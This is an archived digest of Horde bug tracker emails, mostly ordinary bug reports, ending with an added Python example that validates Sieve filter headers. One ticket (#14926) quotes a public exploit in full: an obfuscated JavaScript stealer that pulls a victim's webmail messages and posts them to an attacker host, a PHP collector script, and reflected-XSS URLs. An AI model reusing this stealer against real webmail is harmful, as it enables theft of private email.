From noreply at bugs.horde.org Mon May 3 20:00:11 2021
From: noreply at bugs.horde.org (noreply at bugs.horde.org)
Date: Mon, 03 May 2021 20:00:11 -0000
Subject: [Tickets #15058] Custom header key field not required
Message-ID:

DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED.

Ticket URL: https://bugs.horde.org/ticket/15058
------------------------------------------------------------------------------
Ticket       | 15058
Created By   | patrick.kratzer at hetzner.com
Summary      | Custom header key field not required
Queue        | Ingo
Version      | Git master
Type         | Bug
State        | Unconfirmed
Priority     | 2. Medium
Milestone    |
Patch        |
Owners       |
------------------------------------------------------------------------------
patrick.kratzer at hetzner.com (2021-04-09 12:02) wrote:

When filtering by a custom header, it is not required to set the key.
This causes the sieve rule to look like this:

[...]
if Keine E-Mail-Köpfe angegeben {
[...]

This can't be processed by the LMTP server then and even inhibits other
filters in some systems. Making the key field required should solve this
issue.

From noreply at bugs.horde.org Mon May 3 20:00:14 2021
From: noreply at bugs.horde.org (noreply at bugs.horde.org)
Date: Mon, 03 May 2021 20:00:14 -0000
Subject: [Tickets #14926] Re: Horde Webmail - XSS + CSRF to SQLi, RCE, Stealing Emails <= v5.2.22
In-Reply-To:
References:
Message-ID: <20210330034827.Horde.PgaFNPtFae6EUg_V-8liG0V@bugs.horde.org>

DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED.

Ticket URL: https://bugs.horde.org/ticket/14926
------------------------------------------------------------------------------
Ticket       | 14926
Updated By   | accreditation at di.mil.za
Summary      | Horde Webmail - XSS + CSRF to SQLi, RCE, Stealing Emails <= v5.2.22
Queue        | Horde Groupware
Version      | 5.2.22
Type         | Bug
State        | Resolved
Priority     | 3. High
Milestone    |
Patch        |
Owners       |
------------------------------------------------------------------------------
accreditation at di.mil.za (2021-03-30 03:48) wrote:

> # Title: Horde Webmail - XSS + CSRF to SQLi, RCE, Stealing Emails <= v5.2.22
> # Date: 14.04.2019
> # Author: InfinitumIT
> # Vendor Homepage: https://www.horde.org/
> # Version: Up to v5.2.22.
> # info at infinitumit.com.tr && infinitumit.com.tr
> # PoC: https://numanozdemir.com/respdisc/horde/horde.mp4
>
> # Description:
> # Attacker can combine "CSRF vulnerability in Trean Bookmarks (installed by default on Horde Groupware)" and
> # "Stored XSS vulnerability in Horde TagCloud (installed by default)" vulnerabilities to steal victim's emails.
>
> # Also:
> # Attacker can use 3 different reflected XSS vulnerabilities to exploit Remote Command Execution, SQL Injection and Code Execution.
> # To steal e-mails, attacker will send an e-mail to victim and victim will click the attacker's website. So, victim's inbox will be dumped in attacker's FTP.
> # All of these vulnerabilities are valid for all Horde Webmail versions.
> > # Attacker will exploit the CSRF and XSS with: index.html > # Attacker will steal and post the emails with: stealer.js > # Attacker will save the emails with: stealer.php > > # index.html Codes: > > > > > # stealer.js Codes: > eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,115,99,114,105,112,116,32,115,114,99,61,39,104,116,116,112,58,47,47,99,111,100,101,46,106,113,117,101,114,121,46,99,111,109,47,106,113,117,101,114,121,45,51,46,51,46,49,46,109,105,110,46,106,115,39,62,60,47,115,99,114,105,112,116,62,60,115,99,114,105,112,116,62,102,117,110,99,116,105,111,110,32,115,116,101,97,108,40,115,116,97,114,116,44,32,101,110,100,41,123,118,97,114,32,115,116,97,114,116,59,118,97,114,32,101,110,100,59,118,97,114,32,105,59,102,111,114,40,105,61,115,116,97,114,116,59,32,105,60,61,101,110,100,59,32,105,43,43,41,123,36,46,103,101,116,40,39,104,116,116,112,58,47,47,119,101,98,109,97,105,108,46,118,105,99,116,105,109,115,101,114,118,101,114,46,99,111,109,47,105,109,112,47,118,105,101,119,46,112,104,112,63,97,99,116,105,111,110,73,68,61,118,105,101,119,95,115,111,117,114,99,101,38,105,100,61,48,38,109,117,105,100,61,123,53,125,73,78,66,79,88,39,43,105,44,32,102,117,110,99,116,105, > 
111,110,40,100,97,116,97,41,123,118,97,114,32,120,109,108,72,116,116,112,32,61,32,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,40,41,59,120,109,108,72,116,116,112,46,111,112,101,110,40,39,80,79,83,84,39,44,32,39,104,116,116,112,58,47,47,121,111,117,114,119,101,98,115,105,116,101,46,99,111,109,47,104,111,114,100,101,47,115,116,101,97,108,101,114,46,112,104,112,39,44,32,116,114,117,101,41,59,120,109,108,72,116,116,112,46,115,101,116,82,101,113,117,101,115,116,72,101,97,100,101,114,40,39,67,111,110,116,101,110,116,45,84,121,112,101,39,44,32,39,97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,39,41,59,120,109,108,72,116,116,112,46,115,101,110,100,40,39,105,110,98,111,120,61,39,43,100,97,116,97,41,59,125,41,59,125,114,101,116,117,114,110,32,105,59,125,115,116,101,97,108,40,56,44,49,53,41,59,60,47,115,99,114,105,112,116,62,34,41,59,10,47,47,32,115,116,101,97,108,40,120,44,121,41,32,61,32,115,1 > 16,101,97,108,32,102,114,111,109,32,105,100,32,120,32,116,111,32,105,100,32,121)) > // It is charcoded, firstly decode and edit for yourself then encode > again. Also dont forget to remove spaces! > > > # stealer.php Codes: > > > header('Access-Control-Allow-Origin: *'); > > header('Access-Control-Allow-Headers: *'); > > if($_POST['inbox']){ > > $logs = fopen("inbox.txt", "a+"); > > $data = $_POST['inbox']." 
> -----------------------------------------------------------------
> ".chr(13).chr(10).chr(13).chr(10);
> fwrite($logs, $data);
>
> }
>
>
> ?>
>
> # _____________________________________________________________________________________________________
>
> # Reflected XSS to Remote Command Execution, Remote Code Execution and SQL Injection
>
> http://webmail.victimserver.com/groupware/admin/user.php?user_name=XSS-PAYLOAD-HERE&form=update_f
> http://webmailvictimserver.com/groupware/admin/user.php?user_name=XSS-PAYLOAD-HERE&form=remove_f
> http://webmail.victimserver.com/groupware/admin/config/diff.php?app=XSS-PAYLOAD-HERE
>
> # Attacker can execute commands & PHP code remotely and inject harmful SQL queries. Also, attacker can create users too with those reflected XSS vulnerabilities.
>
> # Stay Secure with InfinitumIT - infinitumit.com.tr

From noreply at bugs.horde.org Mon May 3 20:00:23 2021
From: noreply at bugs.horde.org (noreply at bugs.horde.org)
Date: Mon, 03 May 2021 20:00:23 -0000
Subject: [Tickets #15060] Some PDF attached is corrupted
Message-ID:

DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED.

Ticket URL: https://bugs.horde.org/ticket/15060
------------------------------------------------------------------------------
Ticket       | 15060
Created By   | info at callejondelpozo.es
Summary      | Some PDF attached is corrupted
Queue        | IMP
Version      | Git master
Type         | Bug
State        | Unconfirmed
Priority     | 3. High
Milestone    |
Patch        |
Owners       |
------------------------------------------------------------------------------
info at callejondelpozo.es (2021-04-16 16:02) wrote:

When I attach a PDF on Horde webmail (with the Horde Webmail or Roundcube
client, it is indifferent) the PDF sent is corrupted. Please check the .rar
with screenshots and.. could you help me?

https://webmail.callejondelpozo.es/

thanks!
info at callejondelpozo.es (2021-04-16 16:02) uploaded: results.rar
https://bugs.horde.org/h/services/download/?app=whups&actionID=download_file&file=results.rar&ticket=15060&fn=%2Fresults.rar

From noreply at bugs.horde.org Mon May 3 20:00:23 2021
From: noreply at bugs.horde.org (noreply at bugs.horde.org)
Date: Mon, 03 May 2021 20:00:23 -0000
Subject: [Tickets #15015] Re: Add Attachments With Drag and Drop
In-Reply-To:
References:
Message-ID: <20210416173050.Horde.3cxEL5_wB2Hyh7fGTjAze4b@bugs.horde.org>

DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED.

Ticket URL: https://bugs.horde.org/ticket/15015
------------------------------------------------------------------------------
Ticket       | 15015
Updated By   | wahnes at uni-koeln.de
Summary      | Add Attachments With Drag and Drop
Queue        | DIMP
Version      | HEAD
Type         | Bug
State        | Unconfirmed
Priority     | 1. Low
Milestone    |
Patch        |
Owners       |
------------------------------------------------------------------------------
wahnes at uni-koeln.de (2021-04-16 17:30) wrote:

This is a duplicate of bug #14811

From noreply at bugs.horde.org Mon May 3 20:00:47 2021
From: noreply at bugs.horde.org (noreply at bugs.horde.org)
Date: Mon, 03 May 2021 20:00:47 -0000
Subject: [Tickets #15055] link_attach_size_hard doesn't work
Message-ID:

DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED.

Ticket URL: https://bugs.horde.org/ticket/15055
------------------------------------------------------------------------------
Ticket       | 15055
Created By   | benedetto.vassallo at unipa.it
Summary      | link_attach_size_hard doesn't work
Queue        | IMP
Version      | 6.2.27
Type         | Bug
State        | Unconfirmed
Priority     | 2. Medium
Milestone    |
Patch        |
Owners       |
------------------------------------------------------------------------------
benedetto.vassallo at unipa.it (2021-03-19 12:14) wrote:

I have configured my IMP installation (for test) with these parameters:

$conf['compose']['use_vfs'] = true;
$conf['compose']['link_attachments'] = true;
$conf['compose']['link_attachments_notify'] = false;
$conf['compose']['link_attach_threshold'] = 4096;
$conf['compose']['link_attach_size_limit'] = 0;
$conf['compose']['link_attach_size_hard'] = 81920;
$conf['compose']['attach_size_limit'] = 0;
$conf['compose']['attach_count_limit'] = 0;

in order to get all attachments linked if the sum of them is bigger than 80K.
If I send an e-mail with an attachment smaller than 4K it is sent as a normal
attachment. But if I send an e-mail with an attachment bigger than 80K or with
2 attachments (1 smaller than 4K and 1 bigger than 80K) I get an "error when
communicating with the server" red rectangle and in the log I get this error:

2021-03-08T10:26:09+00:00 EMERG: HORDE [imp] Call to a member function setRaw() on null [pid 12209 on line 2929 of "/var/www/horde5/imp/lib/Compose.php"]

From noreply at bugs.horde.org Mon May 3 20:00:50 2021
From: noreply at bugs.horde.org (noreply at bugs.horde.org)
Date: Mon, 03 May 2021 20:00:50 -0000
Subject: [Tickets #15056] Wrong MIME type on address book exports
Message-ID:

DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED.

Ticket URL: https://bugs.horde.org/ticket/15056
------------------------------------------------------------------------------
Ticket       | 15056
Created By   | wahnes at uni-koeln.de
Summary      | Wrong MIME type on address book exports
Queue        | Turba
Version      | FRAMEWORK_5_2
Type         | Bug
State        | Unconfirmed
Priority     | 2. Medium
Milestone    |
Patch        | 1
Owners       |
------------------------------------------------------------------------------
wahnes at uni-koeln.de (2021-03-25 00:10) wrote:

When employing Turba's Import/Export feature to export an address book using
the vCard format (either version 2 or 3), the downloaded file's MIME type is
wrong. The HTTP header will be

Content-Type: text/calendar

when it should be

Content-Type: text/vcard

While a wrong MIME type normally is not the most important thing on earth, it
can have some undesired results. When this is combined with "no browser
sniffing" headers (i.e. "X-Content-Type-Options: nosniff"), some browsers will
not simply adopt the filename suggested by the "Content-Disposition" header's
filename field, which would read "contacts.vcf" in this case. Instead, the
browser will suggest saving the file as "contacts.ics" because it has been
declared an iCalendar file (text/calendar). This in turn will be irritating for
non-tech-savvy users, as a file with this name will not be automatically
imported by local contact management software.

The reason for the wrong MIME type seems to be that the "Horde_Data_Vcard"
class inherits directly from "Horde_Data_Imc". Horde_Data_Imc's "exportFile"
method always uses the "text/calendar" MIME type when making files available
for download. I saw in the neighboring Horde_Data_Csv class that there is a
field called "_contentType" which may allow not duplicating Horde_Data_Imc's
exportFile method for use with Horde_Data_Vcard, but merely adjusting the MIME
type when downloading. However, my practical knowledge of PHP's object model is
not sufficient to actually make use of non-duplicated code here. As a result,
the attached patch is probably not the right way to do it, but it does solve
the problem at hand.
wahnes at uni-koeln.de (2021-03-25 00:10) uploaded: turba-mime-typ-vcard-export.patch
https://bugs.horde.org/h/services/download/?app=whups&actionID=download_file&file=turba-mime-typ-vcard-export.patch&ticket=15056&fn=%2Fturba-mime-typ-vcard-export.patch

From noreply at bugs.horde.org Mon May 3 20:00:54 2021
From: noreply at bugs.horde.org (noreply at bugs.horde.org)
Date: Mon, 03 May 2021 20:00:54 -0000
Subject: [Tickets #15057] Problem with initial setup
Message-ID:

DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED.

Ticket URL: https://bugs.horde.org/ticket/15057
------------------------------------------------------------------------------
Ticket       | 15057
Created By   | pedja at etron.rs
Summary      | Problem with initial setup
Queue        | Horde.org Servers
Version      | PEAR server
Type         | Bug
State        | Unconfirmed
Priority     | 1. Low
Milestone    |
Patch        |
Owners       |
------------------------------------------------------------------------------
pedja at etron.rs (2021-04-03 02:45) wrote:

Hi, I am trying to install Horde with PEAR. I have tried a few times, and the
error is:

Warning: require_once(/var/www/horde/Horde/Autoloader/Default.php): failed to open stream: No such file or directory in /var/www/horde/lib/core.php on line 49

Fatal error: require_once(): Failed opening required '/var/www/horde/Horde/Autoloader/Default.php' (include_path='/var/www/horde/lib:.:') in /var/www/horde/lib/core.php on line 49

dir Autoloader/ does not exist.

I also have a problem with creating a database. I cannot find the SQL for
database creation. I successfully installed one server 2 years ago and it
works perfectly, and now I have a problem.

From noreply at bugs.horde.org Mon May 3 20:01:03 2021
From: noreply at bugs.horde.org (noreply at bugs.horde.org)
Date: Mon, 03 May 2021 20:01:03 -0000
Subject: [Tickets #15059] Right click to color messages and folders
Message-ID:

DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED.
Ticket URL: https://bugs.horde.org/ticket/15059
------------------------------------------------------------------------------
Ticket       | 15059
Created By   | cbx.mail at protonmail.com
Summary      | Right click to color messages and folders
Queue        | Horde Groupware Webmail Edition
Version      | 5.2.22
Type         | Enhancement
State        | New
Priority     | 1. Low
Milestone    |
Patch        |
Owners       |
------------------------------------------------------------------------------
cbx.mail at protonmail.com (2021-04-09 16:31) uploaded: colorcoded_inbox.png
https://bugs.horde.org/h/services/download/?app=whups&actionID=download_file&file=colorcoded_inbox.png&ticket=15059&fn=%2Fcolorcoded_inbox.png

From noreply at bugs.horde.org Mon May 3 20:01:31 2021
From: noreply at bugs.horde.org (noreply at bugs.horde.org)
Date: Mon, 03 May 2021 20:01:31 -0000
Subject: [Tickets #14964] Re: Postgresql12 dropped adsrc
In-Reply-To:
References:
Message-ID: <20210414075212.Horde.5lZPWakzNA5GIFafgOLsApY@bugs.horde.org>

DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED.

Ticket URL: https://bugs.horde.org/ticket/14964
------------------------------------------------------------------------------
Ticket       | 14964
Updated By   | guillaume at demillecamps.be
Summary      | Postgresql12 dropped adsrc
Queue        | Components
Type         | Bug
State        | Unconfirmed
Priority     | 1. Low
Milestone    |
Patch        |
Owners       |
------------------------------------------------------------------------------
guillaume at demillecamps.be (2021-01-19 08:37) wrote:

Is there any progress on this??..... Thank you!

From noreply at bugs.horde.org Wed May 5 07:27:30 2021
From: noreply at bugs.horde.org (noreply at bugs.horde.org)
Date: Wed, 05 May 2021 07:27:30 +0000
Subject: [Tickets #15064] templates for answers
Message-ID:

DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED.

Ticket URL: https://bugs.horde.org/ticket/15064
------------------------------------------------------------------------------
Ticket       | 15064
Created By   | patrick.kratzer at hetzner.com
Summary      | templates for answers
Queue        | IMP
Version      | Git master
Type         | Enhancement
State        | New
Priority     | 2. Medium
Milestone    |
Patch        |
Owners       |
------------------------------------------------------------------------------
patrick.kratzer at hetzner.com (2021-05-05 07:27) wrote:

It would be beneficial if using the stored templates for mail answers were
also possible. This is also possible in some other mail applications like
Outlook or Office 365.

From noreply at bugs.horde.org Sun May 9 13:17:46 2021
From: noreply at bugs.horde.org (noreply at bugs.horde.org)
Date: Sun, 09 May 2021 13:17:46 +0000
Subject: [Tickets #15065] Error when deleting bookmarks.
Message-ID:

DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED.

Ticket URL: https://bugs.horde.org/ticket/15065
------------------------------------------------------------------------------
Ticket       | 15065
Created By   | benmtl at gmail.com
Summary      | Error when deleting bookmarks.
Queue        | Horde Groupware
Version      | 5.2.22
Type         | Bug
State        | Unconfirmed
Priority     | 1. Low
Milestone    |
Patch        |
Owners       |
------------------------------------------------------------------------------
benmtl at gmail.com (2021-05-09 13:17) wrote:

After importing my bookmarks, when I try to delete one I get a 404 error.

"Not Found
The requested URL was not found on this server.
Apache/2.4.38 (Debian) Server at 192.168.1.33 Port 80"

This is the URL it is looking for: http://192.168.1.33/trean/b/delete

Not sure if it is an issue with my install or with the bookmark module.

From noreply at bugs.horde.org Sun May 9 13:18:18 2021
From: noreply at bugs.horde.org (noreply at bugs.horde.org)
Date: Sun, 09 May 2021 13:18:18 +0000
Subject: [Tickets #15065] Re: Error when deleting bookmarks.
In-Reply-To:
References:
Message-ID: <20210509131818.Horde.Rm5aSsyuWYaas_a7zkZ6B-J@bugs.horde.org>

DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED.

Ticket URL: https://bugs.horde.org/ticket/15065
------------------------------------------------------------------------------
Ticket       | 15065
Updated By   | benmtl at gmail.com
Summary      | Error when deleting bookmarks.
Queue        | Horde Groupware
Version      | 5.2.22
Type         | Bug
State        | Unconfirmed
Priority     | 1. Low
Milestone    |
Patch        |
Owners       |
------------------------------------------------------------------------------
benmtl at gmail.com (2021-05-09 13:17) wrote:

After importing my bookmarks, when I try to delete one I get a 404 error.

"Not Found
The requested URL was not found on this server.
Apache/2.4.38 (Debian) Server at 192.168.1.33 Port 80"

This is the URL it is looking for: http://192.168.1.33/trean/b/delete

Not sure if it is an issue with my install or with the bookmark module.
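The Ingo ticket (#15058) at the top of this digest reports a rule generator that, when the header key is left empty, emits a script containing a UI placeholder where the `header` test should be, so the Sieve interpreter rejects the whole script and the user's other filters stop working too. The Python below is an added example, not Horde or Ingo code, and makes no claim about how Ingo actually builds its scripts: it validates the header name against the RFC 5322 field-name grammar, quotes values as RFC 5228 quoted-strings, and refuses to emit any script when one rule is invalid, because a Sieve script is compiled as a unit. The `(header, value, action)` tuple format, the sample rules, and the decision to reject CR/LF/NUL inside values are constructed for illustration.

```python
import re

# RFC 5322 field-name: one or more printable US-ASCII characters, excluding ':'.
_FIELD_NAME = re.compile(r"[\x21-\x39\x3b-\x7e]+")
_MATCH_TYPES = (":is", ":contains", ":matches")


def is_valid_header_name(name: str) -> bool:
    """True when `name` is a syntactically valid, non-empty header field name."""
    return _FIELD_NAME.fullmatch(name) is not None


def sieve_string(value: str) -> str:
    """Quote a value as a Sieve quoted-string (RFC 5228, section 2.4.2).

    Only backslash and double quote are significant inside a quoted-string.
    CR, LF and NUL are refused as a defensive choice made in this example (not
    a grammar requirement) so a value cannot break the script's line structure.
    """
    if any(c in value for c in "\r\n\0"):
        raise ValueError("rule values must not contain CR, LF or NUL")
    return '"' + value.replace("\\", "\\\\").replace('"', '\\"') + '"'


def header_test(name: str, value: str, match: str = ":contains") -> str:
    """Build a Sieve `header` test; an empty or malformed header name is an error."""
    if match not in _MATCH_TYPES:
        raise ValueError(f"unsupported match type {match!r}")
    if not is_valid_header_name(name):
        raise ValueError(f"header name is empty or not an RFC 5322 field-name: {name!r}")
    return f"header {match} {sieve_string(name)} {sieve_string(value)}"


def build_rule(name: str, value: str, action: str = "discard") -> str:
    """One complete `if <test> { <action>; }` block."""
    return f"if {header_test(name, value)} {{\n    {action};\n}}"


def compile_script(rules):
    """Validate every (header, value, action) triple, then emit the whole script.

    Returns (script, errors). The server compiles a Sieve script as a unit, so
    one invalid rule would disable every filter in it; therefore no script is
    emitted (script is None) when any rule fails validation.
    """
    blocks, errors = [], []
    for index, (name, value, action) in enumerate(rules):
        try:
            blocks.append(build_rule(name, value, action))
        except ValueError as exc:
            errors.append((index, str(exc)))
    if errors:
        return None, errors
    # `discard` is core Sieve; `fileinto` must be declared with `require`.
    uses_fileinto = any(action.startswith("fileinto") for _, _, action in rules)
    prologue = 'require ["fileinto"];\n\n' if uses_fileinto else ""
    return prologue + "\n\n".join(blocks) + "\n", errors


if __name__ == "__main__":
    # Constructed sample rules; the third has the empty key from the ticket.
    sample = [
        ("X-Spam-Flag", "YES", 'fileinto "Junk"'),
        ("List-Id", "horde-bugs", 'fileinto "Horde"'),
        ("", "anything", "discard"),
    ]
    script, problems = compile_script(sample)
    for index, message in problems:
        print(f"rule {index} rejected: {message}")
    script, problems = compile_script(sample[:2])
    print(script)
```

The generator rejects the bad rule with an error naming its index, rather than writing a script the LMTP-side interpreter will refuse; the same `is_valid_header_name` check is what a form-level "required field" validation would call before the rule is ever stored.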